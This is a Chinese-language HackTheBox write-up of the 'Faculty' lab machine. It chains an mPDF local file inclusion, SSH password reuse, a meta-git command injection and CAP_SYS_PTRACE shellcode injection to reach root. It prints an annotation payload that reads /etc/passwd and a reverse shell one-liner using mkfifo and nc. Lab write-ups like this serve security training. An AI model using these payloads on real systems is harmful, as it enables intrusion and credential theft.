HackTheBox - Medium - Linux - Faculty

Faculty

Faculty 是一台中型 Linux 机器,具有 PHP Web 应用程序,该应用程序使用的库容易受到本地文件包含的影响。利用该库中的 LFi 会泄露一个密码,该密码可用于通过 SSH 以名为“gbyolo”的低级用户身份登录。用户“gbyolo”有权作为“developer”用户运行名为“meta-git”的“npm”包。此机器上安装的“meta-git”版本容易受到代码注入攻击,可利用该版本将权限升级到用户“developer”。通过利用“CAP_SYS_PTRACE”功能将 shellcode 注入到以“root”身份运行的进程中,可以将权限提升到“root”。


外部信息收集

端口扫描

循例nmap

HackTheBox - Medium - Linux - Faculty_第1张图片

Web枚举

HackTheBox - Medium - Linux - Faculty_第2张图片

gobuster扫目录

HackTheBox - Medium - Linux - Faculty_第3张图片

admin/

HackTheBox - Medium - Linux - Faculty_第4张图片

这里会转pdf

HackTheBox - Medium - Linux - Faculty_第5张图片

HackTheBox - Medium - Linux - Faculty_第6张图片

download.php,通过html进行url编码后再转base64直接生成pdf

HackTheBox - Medium - Linux - Faculty_第7张图片

尝试打XHR,但没成功

HackTheBox - Medium - Linux - Faculty_第8张图片

从pdf属性看到又是mPDF

HackTheBox - Medium - Linux - Faculty_第9张图片

谷歌能找到一个7.0版本的LFI

HackTheBox - Medium - Linux - Faculty_第10张图片

payload

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />

HackTheBox - Medium - Linux - Faculty_第11张图片

能读到

HackTheBox - Medium - Linux - Faculty_第12张图片

读/etc/nginx/sites-enabled/default

server {
	listen 80 default_server;
	listen [::]:80 default_server;

	root /var/www/html;

	# Add index.php to the list if you are using PHP
	index index.html index.htm index.nginx-debian.html;

	server_name _;

	rewrite ^ http://faculty.htb;
}

Foothold

绝对路径找不到真正的网站根目录,但可以相对路径读

login.php

HackTheBox - Medium - Linux - Faculty_第13张图片

db_connect.php读到一组凭据

HackTheBox - Medium - Linux - Faculty_第14张图片

密码重用于gbyolo账户,我们能够通过它登录ssh

HackTheBox - Medium - Linux - Faculty_第15张图片

本地横向移动 -> developer

sudo -l

HackTheBox - Medium - Linux - Faculty_第16张图片

在谷歌能够找到一篇meta git会受命令注入漏洞影响的文章

通过poc,能够执行命令创建文件

HackTheBox - Medium - Linux - Faculty_第17张图片

reverse shell payload

'sss||mkfifo /tmp/f1;nc 10.10.14.18 8888 < /tmp/f1 | /bin/bash > /tmp/f1 #'

本地权限提升

getcap

HackTheBox - Medium - Linux - Faculty_第18张图片

HackTricks提供了利用方法

msfvenom生成shellcode

HackTheBox - Medium - Linux - Faculty_第19张图片

利用python脚本生成payload

HackTheBox - Medium - Linux - Faculty_第20张图片

gdb

HackTheBox - Medium - Linux - Faculty_第21张图片

get root

HackTheBox - Medium - Linux - Faculty_第22张图片

你可能感兴趣的:(HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误)